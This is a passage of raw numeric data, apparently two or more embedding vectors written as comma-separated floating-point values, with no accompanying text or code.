.010182516,-0.0067264005,-0.00045629728,-0.00217797,0.004035453,-0.007202849,-0.020403128,-0.0061460854,-0.02068886,0.0031042828,-0.0034059193,0.0017830726,-0.0033133535,0.0024563647,0.034867875,0.026818013,0.005969414,0.031446513,-0.020767447,-0.0011259004,-0.0016443623,0.005178679,0.021827055,0.0048592794,0.00026924626,0.011996735,0.0036364924,0.0027991629,-0.0025575652,0.011135178,-0.012954717,-0.0008173538,-0.021614932,0.011002532,-0.000136531,0.026586294,0.014340985,0.0018932299,0.0019364461,0.016958378,-0.01937073,-0.024349334,-0.11698176,-0.024865689,0.03610407,0.005267723,-0.008422183,-0.012372568,0.017665915,0.0015523318,0.0315648,-0.0062996065,-0.0016792042,0.016814996,0.014964459,0.00510097,-0.008546416,0.011686179,-0.03169406,0.019192355,0.010925847,-0.005092383,-0.019629482,0.00020102235,-0.027898883,-0.00016187227,-0.0066443654,-0.005721803,0.0045816754,0.027453141,0.02104664,-0.02796122,-0.0012541926,0.0010373475,-0.0010897267,0.017053552,-0.012027989,-0.02257087,0.014831891,-0.014486277,0.011969409,0.03608486,0.022220055,-0.023990648,0.011431072,0.00024741451,0.0026197878,0.012350524,0.009985099,0.0060583735,0.005465516,-0.0009178758,-0.012637498,0.0026878857,0.0059327357,0.0067609823,-0.0121947285,-0.01965766,-0.022340124,-0.0074954377,-0.008054389,0.018354705,-0.020055296,0.010519194,0.0066795205,0.0057710567,0.008554019,0.03238178,-0.0038294808,0.00064371363,0.0028933533,0.0069710654,-0.019220714,0.0009174011,0.02058472,0.0038949947,0.01887832,0.02699648,-0.0038518307,0.021425856,0.017842095,-0.0130966455,0.0016836197,-0.014559399,-0.024323862,0.0050248574,-0.033551626,-0.014969276,-0.015273288,0.032763463,-0.002862901,0.019437142,-0.009072356,0.019415101,-0.02484339,-0.010115575,0.01655619,0.01480206,0.027266048,0.010967451,-0.015127252,-0.014352575,-0.04442449,-0.000013159176,-0.010518031,0.01939912,-0.011268896,0.006559077,-0.0035434514,-0.036206417,-0.006931132,0.009855545,0.0271998,0.040841404,-0.033153135,0.006489905,0.0026812344,-0.0038488084,-0.011660168,-0.012684006,-0.0027513022,0.0060015204,-0.0070233666,0.025387144,-0.0015684381,-0.0015957315,-0.011906366,-0.0038601817,-0.008456797,0.008690461,0.025185203,0.0016111354,0.010914313,-0.00091137964,0.008856795,-0.04322703,-0.0008325826,-0.0032419953,0.016698923,-0.012847822,-0.0061706332,0.02032368,0.029937563,-0.01481251,0.01559403,-0.006938215,0.010114183,-0.024466423,0.0055386587,0.0055182064,-0.020372251,0.010205922,-0.027066305,0.00025915328,0.0095852595,-0.0005466059,-0.012629589,0.01150469,-0.003085092,0.0003190835,-0.0056999587,0.00036881995,-0.0015277814,0.025878515,0.0051575582,-0.0042643016,0.008074041,-0.003388473,0.026644738,0.0018139977,0.005448339,-0.0042203926,0.0126559865,-0.0016427974,-0.011744757,-0.03104662,-0.0007643063,0.03962806,0.029614672,0.04768135,0.021115996,0.021527361,0.01588563,-0.00048711844,-0.02959893,-0.002669269,0.024175605,0.006325681,-0.022887869,0.02378577,-0.017129304,-0.011964291,0.039077517,-0.0063089165,-0.01855614,0.0015127832,0.002876517,-0.0062098573,-0.0062785633,-0.0052162274,0.011677298,-0.010648926,-0.017088199,0.023216473,0.010528169,-0.017280465,-0.014856444,0.011450197,0.0018178192,0.034279503,0.02648307,-0.004335683,-0.012353114,-0.002975284,0.0033427519,0.0061647235,0.006924645,0.00927321,0.0026224677,-0.02204941,0.0037571515,-0.00045821117,-0.0060909647,-0.01910755,0.021514893,-0.0075307074,0.023053141,0.015377699,0.023527013,-0.016421122,-0.018417867,-0.00950692,0.005708343,0.023243275,-0.017207377,0.009409041,-0.0069839926,-0.0060652927,0.023372691,0.0028025082,-0.020067798,0.009508606,0.009910272,0.01598044,0.02223365,0.042756964,0.008579175,-0.026061047,0.012245803,0.0057642437,-0.0120814815,0.009511866,0.011644512,-0.0049254713,-0.006430433,-0.0022363327,0.00027934735,0.016068868,0.020054387,0.0063969083,0.003783617,0.017297786,-0.018655945,-0.012900374,-0.019386586,0.0008933293,0.013446146,-0.017988175,0.015335729,-0.015344315,-0.0036068275,0.0072466456,-0.0047980244,0.008324174,0.014314923,0.028842445,0.009098306,-0.015015919,-0.012830571,-0.0055153375,-0.004270973,-0.0014043024,-0.0009294631,-0.0052311164,0.00069140247,-0.018466102,-0.0024899165,-0.006941286,-0.002168913,0.016939001,-0.007566427,-0.0055458974,0.00054564094,-0.0056952983,-0.004994369,-0.033009738,-0.018143613,0.0030625416,0.032156203,-0.019684693,-0.01313853,-0.0041637495,0.019984026,0.013147615,0.0037120732,0.009465327,0.006703899,-0.0014691211,-0.007068187,0.016510896,-0.0035314367,0.0004962563,0.00564031,0.0225102,-0.023177115,0.027958365,0.014826237,-0.0026651619,-0.022624739,-0.005050596,-0.013476531,-0.004582969,-0.011637553,0.0020867866,0.03235639,-0.01661437,0.014131789,0.010160212,0.018754246,0.015071607,0.0009884642,0.016329253,0.016949788,0.05766228,0.0029160185,-0.021447137,0.009058768,-0.016378729,0.023794642,0.016264526,-0.0071740025,0.015557185,0.0041143456,-0.0036100578,0.00065253413,-0.009360745,0.011252128,-0.003840752,0.005351188,0.0036194609,0.019079264,0.006149848,0.009950941,0.003147459,-0.014592902,-0.000454751,-0.006310091,0.008322052,-0.009615049,-0.0020868336,-0.0033724743,0.0079697035,-0.008913026,0.0012284742,0.0067195776,-0.00073849934,-0.00853027,-0.010975231,-0.0060507567,0.032572616,-0.01471859,-0.014128402,-0.005665777,-0.0061469586,-0.0026490784,-0.013652328,-0.022504082,-0.0805209,0.0147428475,0.010839275,-0.01047553,0.015087591,-0.013026373,-0.008584685,0.006977671,-0.010438858,0.013634768,-0.00879575,0.0010827467,0.010431239,0.032665312,0.0007739147,-0.011100557,-0.014754006,-0.008937142,0.0006904221,-0.0114581445,0.004792215,0.024836326,-0.003008908,0.009817754,0.0138302315,0.003648929,-0.013437615,-0.011571748,-0.013399912,0.00949333,0.024932636,0.004247234,-0.00032774825,-0.028501142,0.010941509,0.009209622,0.0047151404,0.007475651,0.0014184907,-0.005374087,0.0137071535,0.010525102,0.0017969995,0.0017064564,-0.006944637,0.02476639,-0.025946986,-0.02000125,-0.014712712,-0.00087744126,0.028187428,0.01197495,-0.013098379,0.018333353,0.010608374,0.003558001,0.018062843,-0.014316916,0.030414768,0.00093075,-0.019037358,-0.00523902,0.028992774,0.0028938996,0.0018132858,0.033655148,-0.0033914156,0.022931332,-0.017045476,0.016220665,0.013060913,-0.024229158,-0.022705575,-0.0039102747,-0.02438529,0.025801629,-0.010508001,-0.021547977,0.0023715668,0.009293228,0.015817571,-0.0014543574,0.014135285,-0.011079748,0.0074167172,0.001031222,-0.008118444,0.0006894342,0.043016665,0.014114177,-0.0052657844,0.012835933,0.011954168,-0.0027180843,0.0053642723,0.017245967,0.0023413713,0.004271324,0.024506843,0.018504174,-0.02358118,-0.007954316,0.009029505,-0.018409913,0.010971643,-0.0056171278,0.009822072,0.011030871,-0.0010598582,0.006950789,-0.005454609,0.023961527,0.028297117,0.011002774,0.014927605,0.014455541,-0.0022577762,0.019136356,-0.011997002,-0.008200526,-0.01744272,-0.0049348543,-0.017399145,0.0025751526,0.01556441,-0.0027366644,0.005806794,-0.023110807,-0.012570761,0.0039572455,-0.029964885,0.013520375,0.009162469,0.021673845,0.00012276307,0.007543991,0.0026899155,-0.0013160072,-0.0064396933,0.019678093,0.0037726827,-0.049830347,0.008731001,0.00839216,-0.026997618,0.026619554,-0.013666124,-0.0038690676,0.0061881565,-0.010450822,0.003426368,0.010895666,-0.007047286,0.021858184,0.020382568,0.0074421647,0.0030770965,0.012268164,0.0017041116,-0.007242706,0.011203405,0.017530398,0.025193712,0.007629996,-0.032310594,-0.010627227,0.009463816,0.015248364,-0.017945535,-0.043017987,-0.008121686,-0.0051741772,0.019694977,-0.0068428684,-0.0407282,0.024747705,0.016465744,-0.00033186932,-0.01814859,-0.017395336,-0.018306322,-0.008954098,-0.0127458805,0.019897183,-0.015129102,-0.012858518,-0.021870166,-0.016714362,0.0030413,-0.031498242,-0.014844901,-0.0020802142,0.0013847718,0.014506258,-0.019452222,0.0010535578,0.0037149931,0.0012833778,-0.013411911,0.010585558,-0.027947184,0.008080796,-0.0017957999,0.009480942,0.018130159,0.007475401,0.008701344,-0.0076840553,0.012746942,0.014774925,0.0026857823,0.017282264,0.00200745,0.112287566,0.027480144,-0.0070031346,-0.0023731263,-0.00018910896,0.008022313,0.04271344,0.014048319,0.012172014,0.0040032268,0.014690779,-0.011503361,0.0050278897,-0.0038665228,-0.0057057193,0.016907737,0.011824798,-0.01867475,0.007846923,-0.022698624,0.0000060841794,-0.035984643,-0.022472942,-0.013650877,0.011934701,-0.0521384,0.014823514,0.024212847,-0.004488218,0.009255117,0.029270988,0.016674666,0.019771995,-0.001480104,-0.013013458,-0.009975726,0.015118269,-0.009257728,-0.0042178254,-0.0071107317,0.0124654295,0.008305904,-0.0061377715,-0.022000149,-0.023987878,0.0036977914,-0.0028090838,-0.001672605,0.021827515,-0.006191022,-0.007157933,0.0042182985,0.014435438,-0.024203682,0.010494427,0.0032205242,-0.00053573534,-0.0041955714,-0.0048171827,-0.007908821,0.047187213,-0.007818273,0.011177236,0.0035521963,0.03075362,0.013343984,-0.015909957,-0.008905369,-0.029925957,-0.029610503,0.03079334,-0.0133486455,0.016897032,0.013509414,-0.013208649,0.010449267,-0.015024654,-0.025060426,-0.019050956,-0.023476232,0.007117295,-0.0059086466,-0.0129685765,-0.0018711905,0.04030481,-0.0046595717,0.0056895134,0.019454384,-0.013268584,-0.00026977647,0.00062922435,0.018272646,-0.00063581846,0.0026366625,-0.01304374,0.001585819,0.02817124,-0.026836928,-0.006561888,0.0047795083,0.009966999,-0.009487197,-0.007555217,-0.008808647,-0.009481742,-0.011776276,0.0039079622,0.034337956,-0.011340762,0.0072666705,0.010483748,0.005857558,0.009176561,0.012693117,0.00086738553,-0.0010760397,0.000028065617,-0.011087672,0.0124717895,-0.019209586,0.0018296024,0.0016295757,0.033736344,0.03905487,0.005794187,-0.0075207045,-0.010745889,0.0037988592,-0.0043007312,0.004812102,-0.0018409573,-0.04854039,-0.029611938,0.0046692006,0.0071559153,0.028552635,0.025323639,0.016802775,-0.007905486,0.01271084,0.018018883,0.015515214,-0.015957452,-0.002174025,0.0075895903,-0.013738123,0.02411822,-0.0066726585,0.023056101,-0.0016735601,-0.013857628,0.014262776,0.0009987312,-0.014380706,-0.025232049,-0.030245813,0.0235742,-0.002462501,-0.014088297,-0.0047942027,0.02187263,-0.020456592,0.007565826,-0.03967813,0.014856995,0.009286993,-0.0005035659,0.00022149547,-0.008574141,0.018329091,0.011084632,0.0070635136,0.011910217,0.017183308,-0.012173999,-0.01441839,0.010229918,0.010222458,-0.012675714,-0.00032673465,0.00536288,0.017942237,0.011596994,-0.004778477,0.0085774,-0.0029860928,-0.0072824615,0.0212118,-0.009189045,0.0394719,-0.018159598,0.006268527,0.0014990803,0.0145727275,0.01794239,-0.00023602514,-0.023046682,0.029493313,-0.026004178,-0.045814186,-0.016543502,-0.006125657,-0.011863766,0.005320521,0.0034725307,-0.023238031,-0.0046041054,-0.020288395,-0.008739538,0.0024330213,-0.014210786,0.0039137686,-0.007763905,-0.012864781,-0.006555319,-0.0061452165,-0.019389015,-0.0103246,-0.01909416,0.00040828387,0.011207708,-0.022956017,-0.01975668,-0.004984843,0.009715566,-0.021045608,0.0011205612,0.01908167,0.0131341955,-0.021323303,0.0074355607,0.012688608,-0.016474558,0.00070872897,-0.014858218,0.0068649873,0.008745605,0.011230487,0.0043220706,0.00565784,-0.007307844,-0.018022392,-0.004318889,-0.02086769,-0.026765121,-0.007609817,0.01130431,-0.018276298,-0.018451294,-0.035558943,-0.020246528,0.010651078,-0.026409598,-0.009589901,-0.02346288,-0.0028022034,-0.0059123086,0.02072677,0.018099677,-0.007816641,0.006014969,-0.0023749834,0.008339174,0.01952385,0.015046385,-0.012833335,-0.000586928,-0.006145866,-0.007945627,0.0016970589,-0.012796017,0.019768208,-0.017419526,-0.00621699,-0.023226662,-0.0060709803,0.008902726,-0.0054067867,-0.025065672,0.02119456,0.003048179,-0.0167375,0.012595301,-0.014581714,0.0043725483,-0.0152690755,0.010116589,0.026396899,0.043318734,-0.05213389,-0.003247068,0.051221654,-0.014666058,-0.0091372905,0.0031629568,-0.015261888,-0.06684633,-0.022467742,0.027524028,-0.0037655558,-0.0038913155,-0.02969258,-0.0005491745,0.01701892,-0.030458698,-0.00421768,-0.0070221517,0.006641848,-0.015193201,-0.010429764,-0.004747516,0.00015963094,0.014415717,-0.012958103,-0.015682217,-0.01609384,-0.002913327,0.005567503,-0.009806481,0.0072107776,0.017348122,-0.021816213,0.011063643,-0.010089949,0.01644837,-0.006549232,0.009189837,-0.01637332,-0.008917541,-0.027932508,0.020375326,-0.01564656,-0.004944892,0.011644314,-0.015891733,0.014558548,0.011768345,0.16039903,0.00871908,-0.0077199508,-0.0011221956,-0.009491406,-0.007221662,-0.012664016,0.021938253,-0.0013312105,0.004484203,-0.009187191,-0.006480131,-0.0037913437,0.00016970358,0.007469479,-0.040001635,0.0052206796,0.16079971,0.0088418415,0.02628343,0.00052517303,-0.000393946,0.024496399,0.009590648,0.013171633,-0.05613933,0.0011842891,-0.039888974,0.0007371254,-0.003322845,-0.02770706,0.023327863,0.0025654095,-0.00081853307,0.0013195355,0.022851093,-0.0035488985,-0.011075343,-0.018274352,-0.004171435,0.010557946,-0.0121200355,0.0018134314,0.010853044,0.021230917,0.007185087,-0.017092926,-0.012724636,0.01634126,0.03661798,0.027150821,-0.00435854,0.006381367,0.0011009233,0.007809176,0.016513353,-0.00078173546,0.019117545,-0.028011382,0.015065391,0.010133272,-0.009164698,-0.006867409,0.020285368,-0.02842063,-0.014243639,-0.0028010865,-0.024578443,-0.0038374825,0.009143138,-0.002789733,-0.0072805113,-0.018384362,0.004822968,0.026205044,-0.0029880728,-0.013859183,0.003216496,0.02194731,-0.008655059,0.021002945,0.014399458,-0.02308558,-0.0044430816,0.025433347,0.019051641,0.02128817,0.0007658478,0.0064777085,0.010828782,-0.023662461,0.012669027,-0.0012909172,-0.0004398073,-0.002995687,0.02994628,-0.0032790483,-0.0011674372,0.010542764,-0.01756002,-0.0029468862,0.032449357,0.004878005,0.022011843,0.00081281166,0.022596152,-0.008068864,-0.011944607,-0.0064817737,-0.0038266692,0.0028381168,0.025443682,0.0091904625,0.009802936,-0.012490436,-0.014366202,-0.0033666752,0.01851677,-0.036294743,-0.0017243983,-0.003826803,-0.012746905,0.024039706,0.009355133,-0.022823032,0.0059446874,0.01639509,-0.0039048076,-0.03716861,0.012079586,-0.01974363,-0.01409782,-0.0034068169,0.034872904,0.014759767,-0.0051130108,0.017647743,-0.03858794,-0.029369768,0.00006373277,0.000295717,0.02723792,0.012842685,0.011237695,0.0023641475,-0.0010829375,0.004270943,0.005448932],[0.0057445676,0.0151616875,0.0022022906,-0.028661314,-0.0052833324,0.001388974,-0.025806768,0.010752189,0.013939452,0.0017978905,0.010905671,0.024766572,-0.008713696,0.007395215,-0.008570861,0.019516874,0.01660748,0.005521525,0.013830158,0.013584335,0.006714718,-0.02207418,0.0003072509,-0.020677878,0.015246281,0.01673831,0.00033638827,0.0064188167,-0.00043148443,0.0029296675,0.009906193,0.019851087,0.0052635274,-0.011664929,0.019489659,0.0024930956,0.0026934086,-0.031048229,-0.0010057136,-0.00903717,0.0118826935,-0.005721986,-0.00757774,0.012925083,-0.018329084,-0.006583778,-0.023639986,-0.023212487,-0.028804448,0.0065708295,-0.010083073,0.01574566,-0.0138941165,-0.012160764,-0.029802507,0.009849996,0.0023225215,-0.034130543,0.019624399,-0.0024740433,-0.0071382304,0.019695805,0.012487943,-0.0017779843,0.043262813,-0.0066915797,0.014530137,-0.009720582,-0.035810553,-0.014049542,0.0290317,-0.008651505,-0.0017166021,0.013300645,-0.0074701817,0.0059378827,-0.0031586573,-0.02165355,-0.009319398,-0.03258848,-0.03871196,-0.0070102564,0.01693788,-0.0044350624,-0.00032554506,0.0029700955,-0.0010024292,-0.005371015,-0.0087746885,0.0012126786,-0.017781535,0.008500332,0.00072444277,0.0028887745,0.02070451,0.007441389,0.03147969,0.006270669,0.013191004,-0.009137887,-0.017740587,-0.0055777053,-0.01581083,-0.0005998181,-0.006872315,0.0029335555,0.010654947,0.02465498,0.018073207,-0.005076453,-0.003035131,0.012864579,0.0042601163,0.006114863,-0.00081682595,-0.00681833,0.0030543758,0.013517785,-0.016025746,0.022920158,0.0032555046,-0.012345855,0.01870614,-0.009765551,0.0030935393,-0.00013767237,0.008042103,0.010479266,-0.014139664,-0.019001864,-0.0077170436,0.03693693,-0.0043590516,-0.009495511,0.0006756087,0.008995284,0.0019810728,-0.015192874,0.010844991,-0.0029233252,-0.0011712512,0.015602229,0.04446274,0.02318142,0.0029461777,-0.015486138,-0.00094504363,0.006060308,0.022797808,-0.0068508526,-0.0021448196,0.009450755,0.022293603,-0.010595653,0.0032487812,0.013634655,-0.022945989,-0.005154558,0.015899355,0.0024304558,0.006729947,-0.009118661,-0.0060613006,0.020376844,-0.0044329367,-0.016711174,-0.008252749,0.017549906,0.005944805,-0.0097082425,0.008344693,0.018689312,0.021047318,-0.00775723,-0.008849128,-0.007878432,0.00063049,-0.0031526664,-0.014150948,-0.0035913165,-0.009760023,0.0026871585,0.012715183,-0.008045564,-0.008944548,0.00086899585,0.026447428,0.024265489,0.015848449,-0.004102774,-0.008969408,0.0102504445,0.0054300157,-0.010486411,0.0016720105,0.0009598206,-0.012228836,0.13374877,-0.007875997,-0.016809702,0.006378638,-0.010484938,0.005807543,-0.04363889,-0.011214025,-0.010982352,-0.03177641,-0.023855655,0.002320268,-0.013585704,0.012115072,-0.02752761,0.0017095208,0.0058825333,0.0022017322,-0.059155326,-0.013214732,0.03068515,-0.0046841344,0.007972461,-0.0029395525,-0.0004987116,0.008176375,0.010343115,-0.008077101,-0.011970217,0.012174151,-0.010910571,0.01030141,-0.016974345,0.018010078,0.011895354,-0.025527721,-0.017020129,0.0012495137,-0.025496634,0.0063825874,0.018114228,0.020817382,-0.001874644,-0.009253998,0.0019933162,0.008401357,-0.0061562164,0.00053764845,-0.0031511637,0.0026010042,-0.00053680036,-0.0017730175,-0.021560164,0.0064688832,0.0035299861,0.011780314,0.04364565,0.007281135,-0.013476242,-0.0018158929,-0.00031266987,-0.012500309,0.026767941,-0.012480563,0.020698333,-0.03489997,0.01101792,0.0416419,0.008546385,-0.007332744,-0.0359421,-0.0024818368,-0.0074978196,-0.015557057,-0.013055126,0.016311102,-0.008326867,0.012569497,-0.00026956756,0.026346901,0.011775427,0.017832043,-0.0077666584,-0.008024315,0.0028268488,-0.02673737,-0.019213447,-0.023903567,0.0017211149,-0.005395342,-0.019053861,0.02044999,0.0017784354,-0.011102792,-0.012093389,0.019368486,-0.0023733673,-0.005588908,-0.005506405,-0.031579323,0.006829052,-0.011513998,-0.0058689807,-0.0055251555,-0.009695551,0.01935107,0.024363158,-0.0023819914,0.009934658,-0.01713609,0.032781955,0.0030460719,-0.00023964231,0.0044767694,-0.020545937,-0.0012145067,0.0056487992,-0.00080188655,0.005401624,0.002504528,-0.025271151,-0.015976822,0.01917039,0.035422612,-0.013017018,0.0144987935,0.002065444,0.0070379265,-0.0065138163,0.023206567,-0.009739154,0.02124591,0.014739612,0.0022892621,-0.01809671,0.0042678234,0.018249169,-0.035730302,0.019657992,0.010536244,0.030849928,0.0040045874,0.023372838,-0.0176357,-0.013292317,0.006462941,-0.003289697,-0.012023205,-0.0025885915,-0.0076128943,-0.0008596725,0.021121906,-0.009311418,-0.010713112,0.00062627095,-0.017219696,-0.009025069,-0.022920953,-0.013574001,-0.00845277,-0.008217277,-0.002755421,-0.0057761255,0.020494685,-0.0058214627,0.034478858,0.01684138,0.0406407,-0.00986393,-0.017648714,-0.0044222223,0.00042303366,-0.0332216,0.030789537,0.005579392,-0.0039949603,-0.02043557,-0.023860484,0.003994922,0.0029548176,0.016514763,-0.0118387025,-0.020152263,-0.024827832,0.011621494,-0.01628424,0.005277327,0.012698054,-0.009033673,-0.03611314,0.019231342,0.020782515,0.0088000195,0.0029257676,-0.0071766893,0.012798482,0.002678167,-0.0030683083,-0.0208592,-0.027514908,-0.007867071,-0.0063907453,-0.012846005,-0.013462318,-0.01492675,-0.009407878,-0.00032292164,0.002443977,-0.0038001589,-0.0019776828,0.007857114,-0.01629584,0.012188554,0.0064244834,-0.0027150202,-0.02211283,0.0004842229,0.00629208,0.012617812,-0.014977502,0.010620789,-0.034901977,0.00073290605,0.024504798,-0.04635228,-0.0035261519,-0.007744851,0.005987105,0.019195221,-0.036114093,0.023220906,-0.016036574,0.025808506,-0.008123483,0.0029162092,0.008451892,0.013428,0.005690838,0.012688093,0.031456474,0.006396826,-0.010837641,0.008035288,0.00069303234,0.008019147,0.0065235295,-0.0015831012,-0.018799355,0.005118373,0.021818003,0.013647898,-0.009026562,-0.0040863897,0.007925639,-0.019909939,0.022103485,0.005401446,0.0038369969,0.012645207,0.00721026,-0.009487233,0.011675685,-0.004158894,0.012162756,-0.018267587,-0.007106948,0.014407128,-0.03438818,0.011160894,-0.014446556,-0.029690841,-0.0011102105,0.0041923374,-0.012962821,-0.020225648,0.0014083491,0.035158407,-0.019725969,-0.0002296871,0.010318292,0.00017871024,0.022814495,-0.0024464864,0.014791464,-0.025149234,-0.018217599,0.011860451,0.019201927,0.0014081253,0.00895211,-0.00096701784,-0.022311734,0.014087075,0.005837305,0.0046043913,0.014742005,0.008768496,0.018069591,-0.002304868,0.008814584,-0.026788175,-0.013888453,-0.01035991,-0.0029973257,-0.012209113,0.0005873746,-0.020694558,0.026311712,-0.0065919724,0.030167539,0.015797669,0.007852176,0.030937089,0.02580159,-0.0090094935,0.011841845,-0.020332655,-0.0064271586,-0.0034257227,-0.011995935,-0.021779858,0.016026448,0.009867986,-0.004262863,-0.026889576,-0.024115697,0.0046964297,0.033496965,-0.018843077,0.0049929125,0.0006121683,0.002947722,-0.0059359283,0.01372793,0.05211093,-0.004207537,-0.02575291,0.014965089,-0.017002108,-0.009156102,0.0127825495,0.008697304,-0.01116256,0.027091654,0.0065836417,-0.0019054618,-0.0018864308,0.0075959084,-0.009802878,-0.009124288,0.020271001,0.0008524359,-0.00026557688,0.0019185289,-0.003273184,0.0087734815,-0.0025194797,-0.018295592,-0.028456984,-0.0073827333,0.017704746,0.007855952,-0.0061624562,0.0014873374,-0.011781001,0.006967282,-0.0072898827,-0.0046393503,0.030806905,-0.0018506543,0.011778506,0.00096801994,-0.0008773817,-0.011888258,0.017292397,-0.0068035605,0.01584083,0.013454406,-0.008514016,-0.034665566,-0.015952837,0.0056642103,0.0038916834,0.0042120456,-0.032933988,0.023178697,0.028245041,-0.015530975,-0.009447749,-0.014177608,0.028777251,0.012653136,-0.021115538,-0.011155585,0.01871276,-0.003665351,-0.01762301,-0.010652964,-0.004600718,-0.0010636753,0.0059430986,-0.029426446,0.003910216,-0.014070991,0.008946809,0.0063260384,0.034841668,-0.004268968,-0.0026089223,0.023228787,-0.01380754,0.022998791,0.006026386,0.0034561858,-0.0008917326,0.013572981,-0.0018761447,-0.008473332,0.012795989,-0.0015602468,-0.019380575,0.016901953,0.01864195,-0.007580321,0.014258067,0.012463902,-0.010049481,0.0014493618,0.02216877,0.0109978765,-0.0132335005,0.0009003469,-0.00029655048,0.003878971,-0.020413227,-0.01444261,-0.0237176,0.021119006,-0.0075025233,-0.00260814,-0.0039306013,0.012044645,0.0076072346,-0.011989558,0.00016926884,-0.07290845,0.01997049,0.031046057,0.025232816,-0.014452175,0.04783593,0.0020576825,-0.004997326,-0.0066562193,0.0042866166,0.008658169,0.0028173558,0.009403606,0.00337735,0.026967559,0.020702945,-0.018952424,-0.012715667,-0.010025511,-0.055290896,0.014254341,0.030421639,0.011963694,0.00315487,0.0033895609,-0.002139563,-0.008025941,-0.0047098836,0.0020989038,-0.013856632,0.0015941958,-0.0010186356,-0.009250634,-0.004560281,-0.01856661,0.0009957076,0.00042034223,0.014747166,-0.004991514,-0.0008116354,0.011835546,-0.021474011,-0.017005662,-0.015221258,-0.01726223,0.023151672,-0.019185765,0.012739046,-0.02452679,0.005707772,0.02115467,0.008465709,0.0019886268,-0.0018216806,-0.0006065499,0.0016626461,-0.018433034,0.032087166,-0.01764879,0.0037715964,0.011344688,0.007788037,0.014352972,-0.0037571432,-0.00920535,-0.003793647,-0.001289219,-0.018636892,-0.01677045,0.016482696,0.0049040667,0.01674087,0.022842534,-0.0030551634,0.02359345,-0.009562663,0.006922509,0.014337501,-0.0026860037,0.00094783993,-0.015591855,-0.02443843,-0.021050714,0.018769683,-0.007035175,-0.0142764645,0.004002343,-0.0027150437,0.010850579,0.00832527,-0.0062869703,-0.006009897,-0.024395797,0.0054172296,-0.001413569,-0.012677913,-0.022885153,-0.023254776,0.010888491,0.0040131626,0.029170401,-0.003605318,-0.0042701326,-0.012011857,0.009250451,0.007994863,-0.018517617,-0.0020205346,-0.004124488,0.028485822,-0.0016928003,0.017660383,-0.000119492346,0.025365993,0.004304358,0.03508775,0.0067241713,0.01702099,-0.0018073557,-0.021896558,-0.011300241,0.026766043,-0.011898068,-0.019189663,-0.0127741415,0.0250545,-0.0059156846,-0.004528626,-0.0045191133,0.02483294,0.012164715,-0.001664902,-0.017209621,-0.0010422498,-0.0042930203,-0.01915767,-0.012003588,-0.011031255,-0.025051674,-0.026362529,0.009104487,-0.019145366,0.0123391915,-0.019265536,0.025478443,-0.009723418,-0.015224984,0.013621507,0.00067543436,0.009452724,0.01116992,0.010187156,-0.019555395,-0.023475831,-0.005365564,0.026006488,0.016438652,0.0020517644,-0.018498205,-0.00007389863,-0.024555828,-0.023357421,-0.00021771945,-0.013027029,0.016791297,0.002460828,-0.05609004,0.029590815,-0.008194498,-0.00023675525,0.009787439,0.0057486175,-0.009216837,-0.013633533,-0.016275058,-0.010262289,-0.015178254,0.0068524047,-0.010421622,-0.016813949,0.0015466214,-0.028740004,-0.036537882,0.002082,-0.019349014,-0.002329172,0.01130553,-0.014053028,-0.0024762927,0.013183938,0.007966136,0.0010213851,0.007118386,-0.021700809,0.00975097,-0.007111004,0.016283803,-0.010883941,0.021380983,-0.013692301,0.03135806,0.0017139285,0.005177904,0.02035063,0.0011246162,0.00028781546,0.0044873226,0.023995422,-0.007652935,-0.016005756,0.024592042,-0.011211572,0.0066640708,0.0035607333,-0.00035244322,0.0069803605,-0.005769488,0.0055281855,-0.008964402,0.015424402,-0.008357035,-0.0069983047,-0.020198101,0.009471093,-0.014653804,-0.006289035,0.0011892684,0.0072901817,-0.007746221,0.009805922,0.0005135982,0.015807347,-0.0012813524,-0.018491512,-0.0068648863,-0.021000745,-0.0018985912,0.00086022326,-0.008859192,0.011578324,0.002565509,-0.019013716,0.00047690052,0.021779463,0.0057196887,-0.0016973994,0.009387709,-0.004985938,-0.024288043,-0.009139594,0.0029532919,-0.020598259,-0.0032832706,-0.010360658,-0.0071970774,0.01272958,0.0019231349,-0.009966853,-0.0040880805,-0.018317426,-0.019983258,0.021109309,0.002161594,-0.012103286,-0.023934908,0.0008193571,0.008487647,-0.005249773,-0.013196962,0.004677608,0.01084531,0.030999659,0.010009817,0.019398848,0.00479831,0.018165348,-0.017278327,-0.01300215,0.0021320796,0.0062609757,0.013843123,0.031081343,0.021413825,-0.02673816,0.020451358,-0.024359941,0.0009454677,0.0011808035,-0.013063743,0.018301643,0.0132356025,0.011576692,0.0035760175,-0.013564788,0.011427048,-0.004364219,-0.05502692,0.010447154,0.022500122,0.004828849,0.022864722,0.020628082,0.025436036,0.011156681,0.020512028,-0.0033336384,0.00014420878,0.0018037264,-0.004768505,-0.015057747,0.0011661416,-0.030072747,-0.0020654101,0.0020951966,0.02560253,-0.01043064,-0.009978492,0.008730833,-0.020143922,0.0022280628,0.004933082,-0.01926036,0.007238183,0.032270644,0.0067065535,0.024476565,0.0071168584,-0.0058251326,-0.0022161116,0.0069343564,0.005262716,-0.011792924,0.0024045715,-0.001040443,-0.009830841,0.007787019,0.009053176,-0.021293141,-0.023189701,0.017250083,-0.018293893,-0.016411506,-0.0086155785,-0.012875053,0.0019403027,-0.039250594,0.021700531,-0.020262731,-0.007235913,0.017390285,0.0031353936,0.012998215,0.000009603234,0.0012367138,0.013259166,0.0024563842,0.0028877321,-0.007916657,0.0031887435,0.012578117,-0.0091957105,-0.005324289,-0.004869775,-0.0076344814,0.027759967,0.008710251,-0.022358388,-0.009894307,-0.013725904,0.0025409942,-0.008225026,0.021770837,0.0049506705,-0.008739222,0.00030649177,-0.01660198,-0.018498952,0.010590154,-0.0055864993,0.010533987,-0.032127675,0.026576856,-0.0048300903,-0.006851866,-0.0060001984,-0.013896324,0.006181507,-0.011119387,-0.011753153,0.011625269,0.010910997,0.05365832,0.009030477,0.017754696,-0.00377637,0.012148021,0.0012970387,-0.025864061,-0.002550057,0.02907082,-0.016731296,0.0006224265,-0.010621155,-0.003908572,0.009053671,0.018558932,0.025531715,-0.011293429,0.00094386045,-0.011393897,0.017373797,-0.02953364,-0.0027216068,-0.0080308495,0.045219455,-0.0006439387,0.012904625,-0.022202322,0.0020727315,0.01739439,-0.010239705,0.010709908,-0.003835965,0.028803915,-0.015421794,0.031531744,0.00045318517,0.008115386,-0.008094205,-0.022377808,0.01720054,0.015999377,0.028468411,0.0042117564,-0.014860816,0.0021404587,-0.017796747,-0.0086489525,-0.014030357,0.006493159,0.0054460224,0.017536234,-0.007090366,0.006226938,0.008016953,0.016892716,0.014837894,0.008300738,0.0073418105,0.020762434,-0.013401343,0.0048109754,-0.009789835,-0.005441378,0.0120